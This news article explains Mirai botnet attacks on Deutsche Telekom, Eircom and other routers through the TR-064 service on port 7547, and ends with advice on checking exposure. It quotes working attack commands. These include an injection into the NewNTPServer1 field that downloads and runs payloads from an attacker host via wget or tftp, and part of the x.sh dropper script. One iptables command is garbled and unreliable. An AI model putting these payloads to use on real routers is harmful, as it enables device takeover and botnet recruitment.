Cybercriminals have begun attacking certain models of routers with port 7547 open. Some of them are using the infamous Mirai malware. This attack may affect millions of routers.
Port 7547 Routers
Routers from Deutsche Telekom and Eircom and provided to German and Irish customers have already been identified as vulnerable. Other routers from manufacturers like Zyxel, Speedport, and others also have weaknesses. These routers leave the internet port 7547 open to connections from the outside.
The exploit uses this open port to send commands based on the TR-069 [PDF] and TR-064 protocols. ISPs use these protocols to manage massive amounts of hardware. An advisory by the SANS Internet Storm Center said that honeypot servers pretending to be vulnerable routers are receiving exploits every 5-10 minutes.
The Dean of Research at SANS, Johannes Ullrich, said that the exploits are most likely the cause of an outage affecting Deutsche Telekom customers over the weekend. DT officials said that 900,000 customers are vulnerable unless they reboot the routers and apply and emergency patch.
The Shodan search engine shows that 41 million devices have port 7547 open, and 5 million devices expose TR-064s services to outside influences. Indeed, these attacks started after certain researchers published computer code that exploits the TR-064 service. It’s included as a Metasploit module.
The code opens up port 80, which is the port that enables web browsing and remote administration. After that, routers with default or weak passwords can be remotely taken over and forced to become part of a botnet. Researchers from BadCyber examined some of the malicious computer code and found that the origin was from a Mirai command-and-control server.
In a blog post, the researchers wrote:
“The unusual application of TR-064 commands to execute code on routers has been described for the very first time at the beginning of November, and a few days later a relevant Metasploit module had appeared…”
To infect as many routers as possible, the exploit releases three separate files. Two target routers that run MIPS processors and the final one targets routers with ARM processors. After router infection, the attack closes port 7547 to prevent other cybercriminals from commandeering the devices.
To achieve this, the malware executes the command:
busybox iptables -A INPUT -p tcp --destir busybox killall -9 telnetd
The first command closes port 7547, and the second one kills the telnet service, which makes it difficult for ISPs to update the router remotely. A couple of variants of the original attack are:
cd /tmp;wget http://l.ocalhost.host/x.sh;chmod 777 x.sh;./x.sh <NewNTPServer1>`cd /tmp;tftp -l 3 -r 1 -g l.ocalhost.host;chmod 777 3;./3`</NewNTPServer1> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`
One of the commands changes the download method from what to TFTP, and the other one changes binary download to a script. Part of the script – x.sh – looks like this:
#!/bin/sh # https://www.instagram.com/p/bxI-TSk3p_/ cd /var/tmp cd /tmp rm -f * wget http://l.ocalhost.host/1 busybox chmod a+x 1 chmod 777 1 ./1 rm -f *
This is just part of the script, but you get the idea. Kaspersky researchers say that the command-and-control servers point to IP addresses belonging to the US military. In a blog post, the researchers say that the criminals are likely doing that to throw people off the trail, or just trolling.
“Since there is no Mirai related infrastructure behind this network range, the bots will not receive any further commands until the criminals behind this attack will change the DNS records again…”
Is My Port Open?
If you’re concerned about your router, you can visit the website IsMyPortOpen.com to see if your router has port 7547 open. It’s very easy to do and just requires a click of a button. Aside from that, make sure that your router’s password is secure, and disable any remote administration tools.